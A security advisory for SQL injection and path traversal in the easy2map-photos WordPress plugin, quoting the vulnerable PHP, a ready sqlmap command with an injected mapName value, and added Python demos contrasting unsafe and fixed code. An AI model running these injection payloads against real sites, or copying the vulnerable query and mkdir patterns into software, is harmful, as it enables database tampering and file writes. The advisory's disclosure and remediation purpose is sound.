Advisory #: 130
Title: SQL Injection in easy2map-photos WordPress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
[CVE-2015-4615][CVE-2015-4617]
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor:
Vendor Notified: 2015-06-08
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in Functions.php are vulnerable to SQL injection: request values are formatted straight into the query text with sprintf() and handed to $wpdb->query() without going through $wpdb->prepare() or any other escaping, so a single quote in a parameter such as mapName terminates the string literal and the rest of the value is executed as SQL.

 48 $wpdb->query(sprintf("UPDATE $mapsTable
 49 SET PolyLines = '%s'
 50 WHERE ID = '%s';", $PolyLines, $mapID));

218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));

238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName']

331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));

Also, in MapPinImageUpload.php and MapPinIconSave.php the directory handed to mkdir() is used without being canonicalized or checked against the upload root, so a value containing ../../../../ path traversal sequences creates directories, and lets files be written, outside of the intended upload directory:

if (!file_exists($imagesDirectory)) {
    mkdir($imagesDirectory);
}

CVE-2015-4615 SQL Injection
CVE-2015-4617 Path traversal
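The mkdir($imagesDirectory) pattern above, beside the canonical-path check it is missing, as an added example that is not code from the advisory or the plugin. Python and os.path.realpath stand in for PHP's realpath(); the upload root and the directory names are assumptions chosen for illustration.

```python
# Added example (not from the advisory or the plugin): the unchecked
# mkdir($imagesDirectory) pattern from MapPinImageUpload.php / MapPinIconSave.php,
# and the canonical-path check that blocks ../ traversal.
# The upload root and directory names below are assumptions for illustration.
import os


def unsafe_images_directory(upload_root: str, requested: str) -> str:
    """The vulnerable pattern: join the request value onto the root and trust it.
    A string-prefix check on this value still passes for '../../x' inputs, which
    is why comparing unresolved paths is not a fix."""
    return os.path.join(upload_root, requested)


def resolves_inside(upload_root: str, requested: str) -> bool:
    """True only if the resolved target is the upload root itself or a descendant.
    realpath() collapses '..' segments and follows symlinks before the comparison;
    an absolute 'requested' value discards the root in join() and is caught too."""
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, requested))
    return os.path.commonpath([root, target]) == root


def safe_images_directory(upload_root: str, requested: str) -> str:
    """The fix: canonicalise, then refuse anything that escaped the root."""
    if not resolves_inside(upload_root, requested):
        raise ValueError(f"path traversal rejected: {requested!r}")
    return os.path.realpath(os.path.join(upload_root, requested))


def ensure_images_directory(upload_root: str, requested: str) -> str:
    """Checked replacement for the plugin's file_exists()/mkdir() pair."""
    target = safe_images_directory(upload_root, requested)
    os.makedirs(target, exist_ok=True)
    return target


if __name__ == "__main__":
    root = "/var/www/html/wp-content/uploads/easy2map"  # assumed upload root
    for name in ["map_12", "../../../../tmp/evil", "/etc/cron.d", "map_12/../../escape"]:
        print(f"{name!r:28} joined: {unsafe_images_directory(root, name)}")
        print(f"{'':28} inside root? {resolves_inside(root, name)}")
```

The check has to run on the resolved path: the joined string for `../../../../tmp/evil` still begins with the upload root, so a naive startswith() test would accept it, while realpath() lands it in /tmp.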
Exploit Code:
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
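What the mapName parameter targeted by the sqlmap command above does to the UPDATE at Functions.php line 331, as an added example that is not code from the advisory or the plugin: the sprintf()-style query beside the parameterized form that $wpdb->prepare() would produce. sqlite3 stands in for MySQL, and the table name and rows are constructed test data.

```python
# Added example (not from the advisory or the plugin): the line-331 UPDATE built
# with sprintf()-style formatting versus bound parameters. sqlite3 replaces MySQL;
# the table name and the rows are constructed for the demonstration.
import sqlite3

MAPS_TABLE = "wp_easy2map_maps"  # assumed name; the advisory only shows $mapsTable


def setup() -> sqlite3.Connection:
    """Constructed sample data: three maps, only ID 2 belongs to the caller."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE {MAPS_TABLE} (ID INTEGER PRIMARY KEY, MapName TEXT, IsActive INTEGER)"
    )
    conn.executemany(
        f"INSERT INTO {MAPS_TABLE} (ID, MapName, IsActive) VALUES (?, ?, ?)",
        [(1, "Office", 1), (2, "Holiday", 0), (3, "Private", 1)],
    )
    conn.commit()
    return conn


def map_names(conn: sqlite3.Connection) -> list:
    return conn.execute(f"SELECT ID, MapName FROM {MAPS_TABLE} ORDER BY ID").fetchall()


def save_map_name_unsafe(conn: sqlite3.Connection, map_id: str, map_name: str) -> str:
    """The vulnerable pattern: request values formatted into the SQL text.
    Returns the statement actually executed so the injected query is visible."""
    sql = f"UPDATE {MAPS_TABLE} SET MapName = '%s', IsActive = 1 WHERE ID = %s;" % (
        map_name,
        map_id,
    )
    conn.execute(sql)
    conn.commit()
    return sql


def save_map_name_safe(conn: sqlite3.Connection, map_id: str, map_name: str) -> str:
    """The fix: placeholders with bound values, the equivalent of
    $wpdb->prepare("UPDATE ... SET MapName = %s ... WHERE ID = %d", ...).
    The ID is cast to int, so 'mapID=2 OR 1=1' is rejected instead of interpreted."""
    sql = f"UPDATE {MAPS_TABLE} SET MapName = ?, IsActive = 1 WHERE ID = ?"
    conn.execute(sql, (map_name, int(map_id)))
    conn.commit()
    return sql


if __name__ == "__main__":
    # Closes the 'MapName' literal, adds a WHERE that matches every row and comments
    # out the plugin's own "WHERE ID = ..." clause (trailing space after -- matters in MySQL).
    payload = "Hacked' WHERE 1=1 -- "
    conn = setup()
    print(save_map_name_unsafe(conn, "2", payload))
    print(map_names(conn))  # every map renamed, not only ID 2
    conn = setup()
    save_map_name_safe(conn, "2", payload)
    print(map_names(conn))  # only ID 2 changed, payload stored as plain text
```

The same structure applies to the larger UPDATE at line 218 and the INSERT at line 239: every `'%s'` in those sprintf() templates is a value an authenticated user supplies through $_REQUEST, so each one is an injection point until the statement is built with $wpdb->prepare().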
Screen Shots:
Notes: